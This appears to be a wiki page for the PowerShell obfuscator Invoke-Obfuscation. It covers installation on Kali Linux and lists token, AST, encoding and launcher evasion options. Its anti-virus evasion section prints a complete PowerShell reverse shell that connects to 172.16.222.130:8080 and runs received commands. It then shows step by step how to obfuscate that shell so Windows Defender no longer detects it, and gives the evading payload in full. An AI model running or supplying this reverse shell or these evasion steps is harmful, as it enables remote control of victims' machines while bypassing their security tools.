Invoke-Obfuscation
Jump to navigation
Jump to search
Description
Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.
Installation
On Kali Linux, first install powershell:
$ sudo apt update && sudo apt install powershell
Then install Invoke-Obfuscation:
$ cd /data/src/ $ git clone https://github.com/danielbohannon/Invoke-Obfuscation.git $ cd Invoke-Obfuscation/
Start Powershell and import the module:
$ pwsh PS> Import-Module ./Invoke-Obfuscation.psd1 PS> Invoke-Obfuscation
Evasion techniques
TOKEN
Description: Obfuscate PowerShell command Tokens
- TOKEN\STRING
- Obfuscate String tokens (suggested to run first)
- TOKEN\COMMAND
- Obfuscate Command tokens
- TOKEN\ARGUMENT
- Obfuscate Argument tokens
- TOKEN\MEMBER
- Obfuscate Member tokens
- TOKEN\VARIABLE
- Obfuscate Variable tokens
- TOKEN\TYPE
- Obfuscate Type tokens
- TOKEN\COMMENT
- Remove all Comment tokens
- TOKEN\WHITESPACE
- Insert random Whitespace (suggested to run last)
- TOKEN\ALL
- Select All choices from above (random order)
AST
Description: Obfuscate PowerShell Ast nodes (PS3.0+)
- AST\NamedAttributeArgumentAst
- Obfuscate NamedAttributeArgumentAst nodes
- AST\ParamBlockAst
- Obfuscate ParamBlockAst nodes
- AST\ScriptBlockAst
- Obfuscate ScriptBlockAst nodes
- AST\AttributeAst
- Obfuscate AttributeAst nodes
- AST\BinaryExpressionAst
- Obfuscate BinaryExpressionAst nodes
- AST\HashtableAst
- Obfuscate HashtableAst nodes
- AST\CommandAst
- Obfuscate CommandAst nodes
- AST\AssignmentStatementAst
- Obfuscate AssignmentStatementAst nodes
- AST\TypeExpressionAst
- Obfuscate TypeExpressionAst nodes
- AST\TypeConstraintAst
- Obfuscate TypeConstraintAst nodes
- AST\ALL
- Select All choices from above
STRING
Description: Obfuscate entire command as a String
- STRING\1
- Concatenate entire command
- STRING\2
- Reorder entire command after concatenating
- STRING\3
- Reverse entire command after concatenating
ENCODING
Description: Obfuscate entire command via Encoding
- ENCODING\1
- Encode entire command as ASCII
- ENCODING\2
- Encode entire command as Hex
- ENCODING\3
- Encode entire command as Octal
- ENCODING\4
- Encode entire command as Binary
- ENCODING\5
- Encrypt entire command as SecureString (AES)
- ENCODING\6
- Encode entire command as BXOR
- ENCODING\7
- Encode entire command as Special Characters
- ENCODING\8
- Encode entire command as Whitespace
COMPRESS
Description: Convert entire command to one-liner and Compress
- COMPRESS\1
- Convert entire command to one-liner and compress
LAUNCHER
Description: Obfuscate command args w/Launcher techniques (run once at end)
- LAUNCHER\PS
- PowerShell
- LAUNCHER\CMD
- Cmd + PowerShell
- LAUNCHER\WMIC
- Wmic + PowerShell
- LAUNCHER\RUNDLL
- Rundll32 + PowerShell
- LAUNCHER\VAR+
- Cmd + set Var && PowerShell iex Var
- LAUNCHER\STDIN+
- Cmd + Echo | PowerShell - (stdin)
- LAUNCHER\CLIP+
- Cmd + Echo | Clip && PowerShell iex clipboard
- LAUNCHER\VAR++
- Cmd + set Var && Cmd && PowerShell iex Var
- LAUNCHER\STDIN++
- Cmd + set Var && Cmd Echo | PowerShell - (stdin)
- LAUNCHER\CLIP++
- Cmd + Echo | Clip && Cmd && PowerShell iex clipboard
- LAUNCHER\RUNDLL++
- Cmd + set Var && Rundll32 && PowerShell iex Var
- LAUNCHER\MSHTA++
- Cmd + set Var && Mshta && PowerShell iex Var
Usage
Basic example: display hello world
Let's start with a basic example: we'll obfuscate the command Write-Host 'Hello world' -Foreground-Color green. To do that, follow the below steps:
- Set the script block:
Invoke-Obfuscation> SET SCRIPTBLOCK Write-Host 'Hello world' -ForegroundColor green
- Choose one of the below evasion techniques (we'll choose ENCODING):
Invoke-Obfuscation> ENCODING
- Select the encoding type (we'll choose ASCII, which is the 1st option):
Invoke-Obfuscation\Encoding> 1
- Copy the output:
[STrIng]::joiN( , (( 87 , 114 ,105,116 ,101 ,45 , 72, 111,115, 116 , 32 ,39 ,72 ,101,108 ,108, 111 ,32, 119 ,111 , 114 , 108, 100 ,39 ,32 , 45 , 70, 111 , 114 ,101 ,103 , 114 ,111 ,117 , 110 , 100,67, 111, 108,111 ,114 , 32 ,103 ,114,101 , 101,110)|%{( [chaR][iNT] $_) }))| &( ([STRiNg]$vERbOsEPRefeReNCE)[1,3]+'X'-JoIN)
Anti-Virus evasion example
Let's see how we can use a powershell based reverse shell that will evade Windows Defender.
When we execute the following code in powershell, it will be caught by the anti-virus:
$client = New-Object System.Net.Sockets.TCPClient('172.16.222.130',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- Save the code as
revshell.ps1. - In Kali Linux, start powershell:
$ pwsh
- Import the module:
PS> Import-Module ./Invoke-Obfuscation.psd1 PS> Invoke-Obfuscation
- Import your script:
Invoke-Obfuscation> SET SCRIPTPATH /data/tmp/revshell.ps1
- Select an obfuscation method (we'll choose AST):
Invoke-Obfuscation> AST
- Select ALL:
Invoke-Obfuscation> ALL
- Select 1:
Invoke-Obfuscation> 1
Now, our payload is no longer caught by the anti-virus:
Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient('172.16.222.130',8080));Set-Variable -Name stream -Value ($client.GetStream());[byte[]]$bytes = 0..65535|%{0};while((Set-Variable -Name i -Value ($stream.Read($bytes, 0, $bytes.Length))) -ne 0){;Set-Variable -Name data -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i));Set-Variable -Name sendback -Value (iex $data 2>&1 | Out-String );Set-Variable -Name sendback2 -Value ($sendback + 'PS ' + (pwd).Path + '> ');Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()